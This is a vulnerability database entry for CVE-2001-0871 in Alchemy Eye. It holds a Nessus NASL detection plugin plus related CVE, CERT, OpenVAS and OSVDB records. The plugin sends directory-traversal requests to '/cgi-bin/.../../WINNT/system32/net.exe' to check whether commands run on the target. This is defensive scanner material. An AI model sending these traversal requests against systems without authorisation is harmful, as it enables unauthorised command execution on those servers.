ID ALCHEMY_EYE_HTTP.NASL Type nessus Reporter Tenable Modified 2014-01-07T00:00:00
Description
Alchemy Eye and Alchemy Network Monitor are network management tools for Microsoft Windows. The product contains a built-in HTTP server for remote monitoring and control. This HTTP server allows arbitrary commands to be run on the server by a remote attacker.
#
# This script was written by Drew Hintz ( http://guh.nu )
#
# It is based on scripts written by Renaud Deraison and HD Moore
#
# See the Nessus Scripts License for details
#
# Changes by Tenable:
# - Description whitespace touch-up, added see-also (3/15/10)
include("compat.inc");
if (description)
{
script_id(10818);
script_version("$Revision: 1.24 $");
script_cvs_date("$Date: 2014/01/07 21:38:30 $");
script_cve_id("CVE-2001-0871");
script_bugtraq_id(3599);
script_osvdb_id(684);
script_name(english:"Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution");
script_summary(english:"Determine if arbitrary commands can be executed by Alchemy Eye");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a remote command execution
vulnerability.");
script_set_attribute(attribute:"description", value:
"Alchemy Eye and Alchemy Network Monitor are network management tools
for Microsoft Windows. The product contains a built-in HTTP server for
remote monitoring and control. This HTTP server allows arbitrary
commands to be run on the server by a remote attacker.");
script_set_attribute(attribute:"see_also", value:"http://www.rapid7.com/security-center/advisories/R7-0001.jsp");
script_set_attribute(attribute:"solution", value:
"Either disable HTTP access in Alchemy Eye, or require authentication
for Alchemy Eye. Both of these can be set in the Alchemy Eye
preferences.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2001/11/29");
script_set_attribute(attribute:"plugin_publication_date", value:"2001/12/03");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2001-2014 H D Moore & Drew Hintz ( http://guh.nu )");
script_family(english:"CGI abuses");
script_dependencie("find_service1.nasl", "http_version.nasl");
script_require_keys("www/alchemy");
script_require_ports("Services/www", 80);
exit(0);
}
#
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
function check(req)
{
local_var r, pat;
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req);
if ( r == NULL ) exit(0);
pat = "ACCOUNTS | COMPUTER";
if(pat >< r) {
security_hole(port:port);
exit(0);
}
return(0);
}
dir[0] = "/PRN";
dir[1] = "/NUL";
dir[2] = "";
for(d=0;dir[d];d=d+1)
{
url = string("/cgi-bin", dir[d], "/../../../../../../../../WINNT/system32/net.exe");
check(req:url);
}
{"hash": "9e0c9e0c2e282b1fe5f3ae0fa699c503f34078230dbcd89ec1500f42c6bd4e30", "naslFamily": "CGI abuses", "id": "ALCHEMY_EYE_HTTP.NASL", "lastseen": "2016-09-26T17:23:38", "viewCount": 0, "hashmap": [{"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "9b43e042c3fda0521e383922c2b467e1", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "913199275deb4b08b20791179a956fee", "key": "description"}, {"hash": "18f90f95e216ec0aa7ae6d3399e69fb9", "key": "href"}, {"hash": "cb4e12a5a1e930b1212b619cf4f1abbc", "key": "modified"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "fb6e7c396949fea1f6f6bf144dbc7908", "key": "pluginID"}, {"hash": "4a31c034a204ef6ae9ba01972875fa44", "key": "published"}, {"hash": "20042e8197ebfa32140db30dbe4e8232", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "4767242db8b428b5df9795984021bfec", "key": "sourceData"}, {"hash": "63591426e22db15e82f2db7c72df67f7", "key": "title"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}], "bulletinFamily": "scanner", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "nessus", "description": "Alchemy Eye and Alchemy Network Monitor are network management tools for Microsoft Windows. The product contains a built-in HTTP server for remote monitoring and control. This HTTP server allows arbitrary commands to be run on the server by a remote attacker.", "title": "Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution", "sourceData": "#\n# This script was written by Drew Hintz ( http://guh.nu )\n#\n# It is based on scripts written by Renaud Deraison and HD Moore\n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Description whitespace touch-up, added see-also (3/15/10)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10818);\n script_version(\"$Revision: 1.24 $\");\n script_cvs_date(\"$Date: 2014/01/07 21:38:30 $\");\n\n script_cve_id(\"CVE-2001-0871\");\n script_bugtraq_id(3599);\n script_osvdb_id(684);\n\n script_name(english:\"Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution\");\n script_summary(english:\"Determine if arbitrary commands can be executed by Alchemy Eye\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Alchemy Eye and Alchemy Network Monitor are network management tools\nfor Microsoft Windows. The product contains a built-in HTTP server for\nremote monitoring and control. This HTTP server allows arbitrary\ncommands to be run on the server by a remote attacker.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.rapid7.com/security-center/advisories/R7-0001.jsp\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either disable HTTP access in Alchemy Eye, or require authentication\nfor Alchemy Eye. Both of these can be set in the Alchemy Eye\npreferences.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2001-2014 H D Moore & Drew Hintz ( http://guh.nu )\");\n script_family(english:\"CGI abuses\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_keys(\"www/alchemy\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(!get_port_state(port))exit(0);\n\nfunction check(req)\n{\n local_var r, pat;\n\n req = http_get(item:req, port:port);\n r = http_keepalive_send_recv(port:port, data:req);\n if ( r == NULL ) exit(0);\n pat = \"ACCOUNTS | COMPUTER\";\n if(pat >< r) {\n \tsecurity_hole(port:port);\n\texit(0);\n \t}\n return(0);\n}\n\ndir[0] = \"/PRN\";\ndir[1] = \"/NUL\";\ndir[2] = \"\";\n\nfor(d=0;dir[d];d=d+1)\n{\n\turl = string(\"/cgi-bin\", dir[d], \"/../../../../../../../../WINNT/system32/net.exe\");\n\tcheck(req:url);\n}\n", "objectVersion": "1.2", "cvelist": ["CVE-2001-0871"], "published": "2001-12-03T00:00:00", "pluginID": "10818", "references": ["http://www.rapid7.com/security-center/advisories/R7-0001.jsp"], "reporter": "Tenable", "modified": "2014-01-07T00:00:00", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10818"}
{"result": {"cve": [{"id": "CVE-2001-0871", "type": "cve", "title": "CVE-2001-0871", "description": "Directory traversal vulnerability in HTTP server for Alchemy Eye and Alchemy Network Monitor allows remote attackers to execute arbitrary commands via an HTTP request containing (1) a .. in versions 2.0 through 2.6.18, or (2) a DOS device name followed by a .. in versions 2.6.19 through 3.0.10.", "published": "2001-12-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0871", "cvelist": ["CVE-2001-0871"], "lastseen": "2017-12-19T12:21:03"}], "cert": [{"id": "VU:220715", "type": "cert", "title": "Alchemy Eye HTTP Server does not adequately validate user input thereby allowing remote command execution", "description": "### Overview\n\nAlchemy Eye does not properly validate HTTP requests, allowing arbitrary command execution.\n\n### Description\n\nAlchemy Eye includes an HTTP server for remote system monitoring and control. In versions 2.0 through 2.6 of Alchemy Eye, the HTTP server component does not adequately validate HTTP requests, allowing attackers to execute arbitrary commands. \n \n--- \n \n### Impact\n\nRemote attackers can execute arbitrary commands on the server. \n \n--- \n \n### Solution\n\nThe CERT/CC is currently unaware of a practical solution to this problem. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nAlchemy Lab| | -| 25 Sep 2002 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23220715 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.rapid7.com/advisories/R7-0001.txt>\n * <http://www.securityfocus.com/bid/3599>\n * <http://www.alchemy-lab.com/products/eye/>\n * <http://www.deksoftware.com/alchemy/>\n\n### Credit\n\nThanks to Rapid 7 for reporting this vulnerability.\n\nThis document was written by Shawn Van Ittersum.\n\n### Other Information\n\n * CVE IDs: [CAN-2001-0871](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2001-0871>)\n * Date Public: 29 Nov 2001\n * Date First Published: 27 Sep 2002\n * Date Last Updated: 18 Sep 2003\n * Severity Metric: 6.50\n * Document Revision: 6\n\n", "published": "2002-09-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.kb.cert.org/vuls/id/220715", "cvelist": ["CVE-2001-0871", "CVE-2001-0871"], "lastseen": "2016-02-03T09:12:49"}], "openvas": [{"id": "OPENVAS:136141256231010818", "type": "openvas", "title": "Alchemy Eye HTTP Command Execution", "description": "Alchemy Eye and Alchemy Network Monitor are network management\n tools for Microsoft Windows. The product contains a built-in HTTP\n server for remote monitoring and control. This HTTP server allows\n arbitrary commands to be run on the server by a remote attacker.\n (Taken from the security announcement by http://www.rapid7.com.)", "published": "2005-11-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010818", "cvelist": ["CVE-2001-0871"], "lastseen": "2017-07-02T21:10:06"}], "osvdb": [{"id": "OSVDB:684", "type": "osvdb", "title": "Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.alchemy-lab.com/\nSnort Signature ID: 1505\nSnort Signature ID: 1506\n[CVE-2001-0871](https://vulners.com/cve/CVE-2001-0871)\nBugtraq ID: 3599\n", "published": "2001-11-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:684", "cvelist": ["CVE-2001-0871"], "lastseen": "2017-04-28T13:19:55"}]}}
